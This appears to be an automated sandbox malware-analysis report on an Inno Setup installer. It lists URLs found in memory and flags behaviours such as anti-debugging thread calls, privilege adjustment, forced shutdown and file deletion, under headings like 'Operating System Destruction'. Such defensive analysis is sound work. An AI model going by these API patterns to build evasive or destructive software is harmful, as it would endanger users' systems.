Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://ocsp.digicert.com0X
Source: svchost.exe, 00000000.00000002.1375414809.0000023699613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.12.dr, update.vac.12.dr, update.vac.6.dr, 7zr.exe.12.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://aria2.github.io/Usage:
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373850880.000002369965F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374084418.000002369965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1375834176.0000023699681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374084418.000002369965A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000002.1375547449.000002369963F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1375570309.0000023699642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000003.1374107566.0000023699649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373700171.0000023699662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375773862.0000023699663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375570309.0000023699642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1373850880.000002369965F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1373656171.0000023699667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375809019.0000023699668000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: svchost.exe, 00000000.00000002.1375496859.0000023699634000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.til
Source: svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtu
Source: svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1374188871.000002369963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374188871.000002369963D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374133902.0000023699641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1375467866.000002369962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1374188871.0000023699630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvsX:c
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1375661245.0000023699658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1374167003.0000023699657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007F71B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1283151510.0000000000511000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000000.1355069130.00000000007CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007F71B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1283151510.0000000000511000.00000020.00000001.01000000.00000005.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 0000000C.00000000.1355069130.00000000007CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: update.vac.12.drStatic PE information: section name: .j)q
Source: updat4.vac.12.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C973F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,12_2_6C973F30
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F3886
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F3C62
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F3D62
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F3D18
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F39CF
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,12_2_6C7F3A6A
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C974B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,12_2_6C974B80
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F1950: CreateFileA,DeviceIoControl,CloseHandle,12_2_6C7F1950
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,12_2_6C7F4754
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C7F475412_2_6C7F4754
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97586312_2_6C975863
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C97090012_2_6C970900
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9D4CE012_2_6C9D4CE0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA42DE012_2_6CA42DE0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA24D1012_2_6CA24D10
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9A6EA112_2_6C9A6EA1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2CEF012_2_6CA2CEF0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9C0EC912_2_6C9C0EC9
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9F8EEF12_2_6C9F8EEF
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9F289612_2_6C9F2896
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3A8D012_2_6CA3A8D0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3482012_2_6CA34820
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1C81012_2_6CA1C810
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA4287012_2_6CA42870
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA4499912_2_6CA44999
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3893012_2_6CA38930
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2490012_2_6CA24900
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9A697212_2_6C9A6972
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3695012_2_6CA36950
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA32AA012_2_6CA32AA0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9FEA5212_2_6C9FEA52
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA18B9012_2_6CA18B90
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9AEBCA12_2_6C9AEBCA
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3CBC012_2_6CA3CBC0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9BEB6612_2_6C9BEB66
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA064AC12_2_6CA064AC
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3248912_2_6CA32489
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2C4D012_2_6CA2C4D0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2058012_2_6CA20580
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2A58012_2_6CA2A580
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA225D012_2_6CA225D0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1052112_2_6CA10521
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3652012_2_6CA36520
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA426C012_2_6CA426C0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3C60012_2_6CA3C600
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA347A012_2_6CA347A0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA0A7F312_2_6CA0A7F3
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9AA7CF12_2_6C9AA7CF
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA447C012_2_6CA447C0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2C0E012_2_6CA2C0E0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1E02012_2_6CA1E020
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3A2A012_2_6CA3A2A0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3620012_2_6CA36200
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA43D9012_2_6CA43D90
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9F5D4312_2_6C9F5D43
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA21D5012_2_6CA21D50
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA27E8012_2_6CA27E80
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9FFF1112_2_6C9FFF11
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1389F12_2_6CA1389F
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA358C812_2_6CA358C8
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA279F012_2_6CA279F0
